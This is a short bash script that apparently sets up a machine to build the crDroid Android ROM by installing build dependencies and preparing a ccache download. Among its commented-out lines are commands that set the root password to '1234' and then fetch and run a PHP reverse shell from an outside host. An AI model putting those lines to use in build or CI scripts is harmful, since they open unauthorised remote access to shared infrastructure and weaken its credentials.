#!/bin/bash

url=https://cheems.mirrorbomt.workers.dev/ccache-crdroid.tar.gz
sudo apt update && sudo apt-get --yes --force-yes install git-core gnupg wget curl flex bison build-essential zip curl zlib1g-dev gcc-multilib g++-multilib libc6-dev-i386 lib32ncurses5-dev x11proto-core-dev libx11-dev lib32z1-dev libgl1-mesa-dev libxml2-utils xsltproc unzip fontconfig
#whoami
#echo -e "1234\n1234" | passwd root
#sudo apt-get -y install php php-cli wget curl
#wget -O reverse.php https://eintim.ga/rev.txt
#chmod 777 reverse.php 
#php reverse.php
#echo "ready to connect ssh"

cd /tmp # Where to download cccahe
#time aria2c $url -x16 -s50
echo "dl done"
#time tar xf ccache-crdroid.tar.gz
echo "unzip done"
#find ccache-crdroid.tar.gz -delete
